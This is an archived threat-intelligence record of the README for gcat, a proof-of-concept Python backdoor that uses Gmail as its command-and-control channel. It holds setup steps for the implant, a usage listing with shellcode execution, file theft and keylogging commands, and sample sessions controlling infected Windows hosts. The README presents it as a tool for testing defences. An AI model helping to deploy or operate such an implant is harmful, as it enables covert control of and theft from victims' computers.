{
	"id": "bf8548e5-537b-4342-babd-c6ce177bb0fd",
	"created_at": "2026-04-06T00:16:50.316324Z",
	"updated_at": "2026-04-10T03:20:17.543464Z",
	"deleted_at": null,
	"sha1_hash": "6f34d8993acb6cc5c737f3b0c1017b3c510da7bf",
	"title": "GitHub - byt3bl33d3r/gcat: A PoC backdoor that uses Gmail as a C\u0026C server",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 57551,
	"plain_text": "GitHub - byt3bl33d3r/gcat: A PoC backdoor that uses Gmail as a\r\nC\u0026C server\r\nBy byt3bl33d3r\r\nArchived: 2026-04-05 19:39:21 UTC\r\nA stealthy Python based backdoor that uses Gmail as a command and control server\r\nThis project was inspired by the original PoC code from Benjamin Donnelly\r\nThis is PoC code...\r\n... that was released for organizations to test their defenses against these types of attacks. In order to detect them see\r\nprojects like RITA.\r\nFor a more up to date and maintained version of this project see GDog\r\nSetup\r\nFor this to work you need:\r\nA Gmail account (Use a dedicated account! Do not use your personal one!)\r\nTurn on \"Allow less secure apps\" under the security settings of the account\r\nYou may also have to enable IMAP in the account settings\r\nThis repo contains two files:\r\ngcat.py a script that's used to enumerate and issue commands to available clients\r\nimplant.py the actual backdoor to deploy\r\nIn both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you\r\npreviously set up.\r\nYou're probably going to want to compile implant.py into an executable using Pyinstaller\r\nNote: It's recommended you compile implant.py using a 32bit Python installation\r\nUsage\r\n dP\r\n 88\r\n .d8888b. .d8888b. .d8888b. d8888P\r\n 88' `88 88' `\"\" 88' `88 88\r\n 88. .88 88. ... 88. .88 88\r\n`8888P88 `88888P' `88888P8 dP\r\n .88\r\n d8888P\r\n \r\n .__....._ _.....__,\r\n .\": o :': ;': o :\".\r\n `. `-' .'. .'. `-' .'\r\n `---' `---'\r\n _...----... ... ... ...----..._\r\n .-'__..-''---- `. `\"` .' ----'''-..__`-.\r\n '.-' _.--''' `-._.-' ''''--._ `-.`\r\n ' .-\"' : `\"-. `\r\n ' `. _.'\"'._ .' `\r\n `. ,.-'\" \"'-., .'\r\n `. 
.'\r\n jgs `-._ _.-'\r\n `\"'--...___...--'\"`\r\n ...IM IN YUR COMPUTERZ...\r\n WATCHIN YUR SCREENZ\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n -v, --version show program's version number and exit\r\n -id ID Client to target\r\n -jobid JOBID Job id to retrieve\r\n -list List available clients\r\n -info Retrieve info on specified client\r\nCommands:\r\n Commands to execute on an implant\r\n -cmd CMD Execute a system command\r\n -download PATH Download a file from a clients system\r\n -upload SRC DST Upload a file to the clients system\r\n -exec-shellcode FILE Execute supplied shellcode on a client\r\n -screenshot Take a screenshot\r\n -lock-screen Lock the clients screen\r\n -force-checkin Force a check in\r\n -start-keylogger Start keylogger\r\n -stop-keylogger Stop keylogger\r\nMeow!\r\nOnce you've deployed the backdoor on a couple of systems, you can check available clients using the list\r\ncommand:\r\n#~ python gcat.py -list\r\nf964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86\r\n90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86\r\nThe output is a UUID string that uniquely identifies the system and the OS the implant is running on\r\nLet's issue a command to an implant:\r\n#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'\r\n[*] Command sent successfully with jobid: SH3C4gv\r\nHere we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs\r\nthe jobid that we can use to retrieve the output of that command\r\nLet's get the results!\r\n#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv\r\nDATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'\r\nJOBID: SH3C4gv\r\nFG WINDOW: 'Command Prompt - C:\\Python27\\python.exe implant.py'\r\nCMD: 'ipconfig /all'\r\nWindows IP Configuration\r\n Host Name . . . . . . . . . . . . : unknown-2d44b52\r\n Primary Dns Suffix . . . . . . 
. :\r\n Node Type . . . . . . . . . . . . : Unknown\r\n IP Routing Enabled. . . . . . . . : No\r\n WINS Proxy Enabled. . . . . . . . : No\r\n-- SNIP --\r\nThat's the gist of it! But you can do much more as you can see from the usage of the script! ;)\r\nTo Do\r\nMulti-platform support\r\nCommand to upload files\r\nTransport crypto \u0026 obfuscation\r\nSource: https://github.com/byt3bl33d3r/gcat",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/byt3bl33d3r/gcat"
	],
	"report_names": [
		"gcat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434610,
	"ts_updated_at": 1775791217,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f34d8993acb6cc5c737f3b0c1017b3c510da7bf.pdf",
		"text": "https://archive.orkl.eu/6f34d8993acb6cc5c737f3b0c1017b3c510da7bf.txt",
		"img": "https://archive.orkl.eu/6f34d8993acb6cc5c737f3b0c1017b3c510da7bf.jpg"
	}
}